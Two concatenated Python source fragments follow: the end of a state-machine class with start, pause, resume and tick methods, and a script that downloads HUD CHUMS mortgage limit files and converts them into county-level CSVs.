        return self.__states.get(self.__default)
    @property  # Override
    def current_state(self) -> S:
        return self.__current
    @current_state.setter  # Override
    def current_state(self, state: S):
        self.__current = state
    # Override
    def target_state(self, transition: BaseTransition[C]) -> S:
        """Resolve a transition's target state by name."""
        return self.__states.get(transition.target)
    # Override
    def change_state(self, state: Optional[S]):
        """Switch to *state* (None on stop), firing enter events before the
        switch and exit events for the old state after it."""
        machine = self.context
        old = self.current_state
        delegate = self.delegate
        # events before state changed
        if delegate is not None:
            delegate.enter_state(state, machine)
        if state is not None:
            state.on_enter(machine)
        # change state
        self.current_state = state
        # events after state changed
        if delegate is not None:
            delegate.exit_state(old, machine)
        if old is not None:
            old.on_exit(machine)
    #
    #   Actions
    #
    # Override
    def start(self):
        """Enter the default state and begin running."""
        self.change_state(state=self.default_state)
        self.__status = Status.RUNNING
    # Override
    def stop(self):
        """Stop ticking and leave the current state."""
        self.__status = Status.STOPPED
        self.change_state(state=None)
    # Override
    def pause(self):
        """Notify delegate/state of the pause, then freeze ticking."""
        machine = self.context
        current = self.current_state
        # events before state paused
        delegate = self.delegate
        if delegate is not None:
            delegate.pause_state(current, machine)
        current.on_pause(machine)
        # pause state
        self.__status = Status.PAUSED
    # Override
    def resume(self):
        """Resume ticking, then notify delegate/state of the resume."""
        machine = self.context
        current = self.current_state
        # reuse state
        self.__status = Status.RUNNING
        # events after state resumed
        delegate = self.delegate
        if delegate is not None:
            delegate.resume_state(current, machine)
        current.on_resume(machine)
    #
    #   Ticker
    #
    # Override
    def tick(self):
        """Evaluate the current state's transitions and follow the first match."""
        machine = self.context
        current = self.current_state
        if current is not None and self.__status == Status.RUNNING:
            trans = current.evaluate(machine)
            if trans is not None:
                # assert isinstance(trans, BaseTransition), 'transition error: %s' % trans
                target = self.target_state(transition=trans)
                assert target is not None, 'target state error: %s' % trans.target
                self.change_state(state=target)
|
import datetime
import os
from collections import OrderedDict
import requests
from unicodecsv import DictReader
from unicodecsv import writer as Writer
ERROR_MSG = "Script failed to process all files."
# Directory layout: <api root>/data/base_data holds the reference CSVs
API_DIR = os.path.abspath(
    os.path.dirname(os.path.dirname(__file__))
)
DATA_DIR = "{}/data".format(API_DIR)
CSV_DIR = "{}/base_data".format(DATA_DIR)
# HUD CHUMS fixed-width source files, parameterized by calendar year
CHUMS_FHA_URL = 'https://www.hud.gov/pub/chums/cy{}-forward-limits.txt'
CHUMS_GSE_URL = 'https://www.hud.gov/pub/chums/cy{}-gse-limits.txt'
# (field name, (start, end)) column spans of the fixed-width CHUMS records
CHUMS_SPACING = [
    ('msa-code', (0, 5)),
    ('metro-code', (5, 10)),
    ('metro-name', (10, 60)),
    ('program', (60, 65)),
    ('limit-type', (65, 66)),  # S or H, standard or high
    ('median-price', (66, 73)),
    ('limit-1-unit', (73, 80)),
    ('limit-2-units', (80, 87)),
    ('limit-3-units', (87, 94)),
    ('limit-4-units', (94, 101)),
    ('state', (101, 103)),
    ('county-fips', (103, 106)),
    ('state-name', (106, 132)),
    ('county-name', (132, 147)),
    ('county-transaction-date', (147, 155)),
    ('limit-transaction-date', (155, 163)),
    ('median-price-determining-limit', (163, 170)),
    ('year-for-median-determining-limit', (170, 175))
]
CHUMS_MAP = OrderedDict(CHUMS_SPACING)
# Output column order for the final merged CSV
FINAL_FIELDNAMES = [
    u'State',
    u'State FIPS',
    u'County FIPS',
    u'Complete FIPS',
    u'County Name',
    u'GSE limit',
    u'FHA limit',
    u'VA limit'
]
def load_FIPS():
    """Read the county FIPS reference CSV and return its rows as dicts.

    Opens the file in binary mode: unicodecsv readers expect a binary
    file object, and the legacy 'rU' mode used previously is deprecated
    since Python 3.4 and removed in Python 3.11.
    """
    with open('{}/county_FIPS.csv'.format(CSV_DIR), 'rb') as f:
        reader = DictReader(f)
        return [row for row in reader]
def translate_data(data_list, data_map):
    """Slice each fixed-width line into a dict of stripped field values.

    data_map maps field name -> (start, end) character offsets; one output
    dict is produced per input line, preserving input order.
    """
    return [
        {field: line[start:stop].strip()
         for field, (start, stop) in data_map.items()}
        for line in data_list
    ]
def download_datafile(url):
    """GET url and return the response body text.

    On a non-OK HTTP status, returns an "Error:..." string instead of
    raising — callers detect failure via the "Error" prefix.
    """
    response = requests.get(url)
    if not response.ok:
        return "Error:\n{} {}\n{}".format(
            response.status_code,
            response.reason,
            response.url)
    return response.text
def dump_to_csv(filepath, headings, data):
    """Write data (an iterable of dicts) to filepath as CSV.

    headings supplies both the header row and the per-row column order.
    Opens the file in binary mode: unicodecsv writers emit encoded bytes,
    so text mode 'w' fails with TypeError on Python 3.
    """
    # Materialize once so dict views (e.g. CHUMS_MAP.keys()) are reusable.
    fieldnames = list(headings)
    with open(filepath, 'wb') as f:
        writer = Writer(f)
        writer.writerow(fieldnames)
        for row in data:
            writer.writerow(
                [row[key] for key in fieldnames]
            )
def assemble_final_data(fha_data, gse_data):
    """Combine FHA and GSE limit rows into the final per-county records.

    Returns a list of dicts keyed by FINAL_FIELDNAMES; the VA limit mirrors
    the GSE limit. Raises KeyError if a county appears in the FHA data but
    is missing from the county FIPS reference file or the GSE data.
    """
    county_data = load_FIPS()
    county_by_fips = {row['Complete FIPS']: row for row in county_data}
    # Map each state to its ANSI/FIPS code in a single pass. The original
    # nested scan used `continue` where `break` was intended, rescanning
    # every county row per state; first occurrence wins here.
    state_fips = {}
    for row in county_data:
        state_fips.setdefault(row['State'], row['State ANSI'])
    final_data = []
    for row in fha_data:
        # Skip header/footer/blank lines that lack state or county codes.
        if row['state'] and row['county-fips']:
            FIPS = state_fips[row['state']] + row['county-fips']
            final_data.append({
                u'State': row['state'],
                u'State FIPS': state_fips[row['state']],
                u'County FIPS': row['county-fips'],
                u'Complete FIPS': FIPS,
                u'County Name': county_by_fips[FIPS]['County Name'],
                u'GSE limit': None,  # filled in below
                u'FHA limit': int(row['limit-1-unit']),
                u'VA limit': None  # filled in below
            })
    # Index GSE limits by complete FIPS, then back-fill the GSE/VA columns.
    gse_by_fips = {}
    for row in gse_data:
        if row['state'] and row['county-fips']:
            FIPS = state_fips[row['state']] + row['county-fips']
            gse_by_fips[FIPS] = int(row['limit-1-unit'])
    for row in final_data:
        limit = gse_by_fips[row['Complete FIPS']]
        row['GSE limit'] = limit
        row['VA limit'] = limit
    return final_data
def get_chums_data(year=None):
    """
    Downloads and processes mortgage data files for the next year.

    Normally, updates are run in December preceding the new data year,
    so the default year is current year + 1.
    If updates need to be run for the current year, or any other year,
    then pass in your desired 'year' value.

    Files are available manually
    at https://www.hud.gov/pub/chums/file_layouts.html

    Returns a human-readable progress message. On any failure the message
    starts with ERROR_MSG and includes whatever progress was logged before
    the failure, plus the triggering exception's text.
    """
    year = year or datetime.date.today().year + 1
    msg = ''
    try:
        # CHUMS files use Windows (CRLF) line endings.
        fha = download_datafile(CHUMS_FHA_URL.format(year)).split('\r\n')
        if fha[0].startswith("Error"):
            msg += fha[0]
            raise ValueError(fha[0])
        fha_data = translate_data(fha, CHUMS_MAP)
        dump_to_csv(
            '{}/forward_limits_{}.csv'.format(CSV_DIR, year),
            CHUMS_MAP.keys(),
            fha_data)
        msg += ('FHA limits saved to {}/forward_limits_{}.csv\n'.format(
            CSV_DIR, year))
        gse = download_datafile(CHUMS_GSE_URL.format(year)).split('\r\n')
        if gse[0].startswith("Error"):  # pragma: no cover tested above
            msg += gse[0]
            raise ValueError(gse[0])
        gse_data = translate_data(gse, CHUMS_MAP)
        gse_file = '{}/gse_limits_{}.csv'.format(CSV_DIR, year)
        dump_to_csv(gse_file, CHUMS_MAP.keys(), gse_data)
        msg += 'GSE limits saved to {}\n'.format(gse_file)
        final_data = assemble_final_data(fha_data, gse_data)
        yearly_file = '{}/county_limit_data_flat_{}.csv'.format(CSV_DIR, year)
        final_file = '{}/county_limit_data_latest.csv'.format(DATA_DIR)
        dump_to_csv(yearly_file, FINAL_FIELDNAMES, final_data)
        dump_to_csv(final_file, FINAL_FIELDNAMES, final_data)
        msg += ('Final flat file saved to {}\n'.format(final_file))
        msg += ("All county source files processed.\n"
                "Data can be loaded with this command: \n"
                "`python manage.py load_county_limits "
                "data/county_limit_data_latest.csv --confirm=y`")
    except Exception as exc:
        # Include the exception so unexpected failures (network errors,
        # missing FIPS entries, bad data) are not silently reduced to the
        # generic ERROR_MSG with no diagnostic.
        return "{}\n{}\n{}".format(ERROR_MSG, msg, exc)
    return msg
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.